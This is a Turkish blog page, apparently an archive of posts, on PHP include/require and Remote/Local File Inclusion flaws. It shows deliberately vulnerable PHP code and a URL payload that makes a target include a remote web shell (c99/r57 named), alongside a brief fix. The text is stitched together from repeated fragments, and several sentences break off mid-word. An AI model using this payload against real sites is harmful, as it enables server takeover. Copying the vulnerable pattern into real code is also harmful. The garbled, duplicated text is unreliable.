*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…
require / require_once : Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).
variable : Değişken anlamına gelmektedir.Bizim açığımız da bu kodlamadan kaynaklanmaktadır. Yani örneğin ; include ile bi dosya, sayfaya dahil edilirken komutun içinde değişkenler de bulunur (örnek bi değişken : $external). Bu değişken aynı sayfada define edilmezse yani
*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…
require / require_once : Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).
variable : Değişken anlamına gelmektedir.Bizim açığımız da bu kodlamadan kaynaklanmaktadır. Yani örneğin ; include ile bi dosya, sayfaya dahil edilirken komutun içinde değişkenler de bulunur (örnek bi değişken : $external). Bu değişken aynı sayfada define edilmezse yani tanımlanmazsa burda bu açık kullanılabilir…
Remote File İnclude (RFI)
Uzaktan dosya dahil etme anlama gelen RFI da tanımlanmamış değişkenler tanımlanır ve açık varsa istenilen değere atanır… örneğin ; shell(c99,r57 vs… ).
include ($external. ’../function.php’) ;
?>
Bu Kodu,
Vermiş olduğum bu kodu x.php olarak kaydedip php destekleyen bi hosta atın ve çalıştırın.Bu sayfayı çalıştıdığınızda bi hata alıcaksınız.Bu hata dahil ettiğimiz function.php dosyasının bulunamamasından kaynaklanmaktadır,bu bizi ilgilendirmiyor.
www.site.com/x.php?external=http://www.sitemiz.com/shell.php?
Açık yukarıdaki gibi kullanılabilir.Engellemek için :
$external= ’data’;
include ($external. ’../function.php’);
?>
Vermiş olduğum bu kodu da x2.php olarak kaydedip hostunuza atın ve yine bu sayfayı açtığınız zaman tekrar function.php dosyasının b
*Remote File İnclude: Uzaktan Dosya Dahil Etme anlamına gelmektedir.
*Local File İnclude: ise Aynı serverdan dosya dahil etme anlamına gelmektedir…
include / include_once : Bu kodla uzaktan dosya dahil edilir.Uzun satırlar alan kodlar bu komutla başka sayfada kodlanmış olarak gösterilerek tek satıra indirgenir…
require / require_once : Bu kod da aynı include kodunun yaptığı işi yapar,fakat include ile kodlanmış bi sayfada çağrılan(dahil edilen) dosya bulunamazsa php yorumlayıcımız bu kodun olduğu satırı hata mesajı göndererek atlar ve sayfanın diğer kalan kodlarını yorumlamaya devam eder fakat include komutundan sonra require komutu da kullanılmışsa; çağırılan dosya bulunamadığı taktirde bir hata verir ve yorumlamayı durdurur. require in include den farkı budur. Yine de RFI/LFI açığı bulurken require ile include aynı derecede işimize yarar(ilerde görücez).
include_once etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
include_once etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
8 Haziran 2010 Salı
İnclude Ve Require Fonksiyonu’nun Kullanımı
Arkadaşlar aslında bu fonksiyonların kullanım alanları ve görevli aynı diyebiliriz. Fakat gerçekten büyük projelerde dikkat edilmesi gereken bir konu olduğunu söyleyebiliriz. O zaman başlayalım anlatmaya. İlk önce farklarına değinmek istiyorum.
İnclude() fonksiyonun’da eğer include edilen dosya’da hata varsa , fonksiyonun bulunduğu sayfa görüntülenir fakat include edilen yerde bir hata mesajı verilir.
Require() fonksiyonuna gelirsek Require edilen dosyada hata varsa o hata bütün sayfayı kapatır.
Yorumum doğru olur mu bilmem ama İnclude ile dosyanın alındığına dair bir bilgi alıyor programımız. Require’de ise oraya sanki diğer sayfadaki kodu koymuşuz gibi oluyor.Arkadaşlar aslında bu fonksiyonların kullanım alanları ve görevli aynı diyebiliriz. Fakat gerçekten büyük projelerde dikkat edilmesi gereken bir konu olduğunu söyleyebiliriz. O zaman başlayalım anlatmaya. İlk önce farklarına değinmek istiyorum.
İnclude() fonksiyonun’da eğer include edilen dosya’da hata varsa , fonksiyonun bulunduğu sayfa görüntülenir fakat include edilen yerde bir hata mesajı verilir.
Require() fonksiyonuna gelirsek Require edilen dosyada hata varsa o hata bütün sayfayı kapatır.
Yorumum doğru olur mu bilmem ama İnclude ile dosyanın alındığına dair bir bilgi alıyor programımız. Require’de ise oraya sanki diğer sayfadaki kodu koymuşuz gibi oluyor.Arkadaşlar aslında bu fonksiyonların kullanım alanları ve görevli aynı diyebiliriz. Fakat gerçekten büyük projelerde dikkat edilmesi gereken bir konu olduğunu söyleyebiliriz. O zaman başlayalım anlatmaya. İlk önce farklarına değinmek istiyorum.
Kaydol:
Kayıtlar (Atom)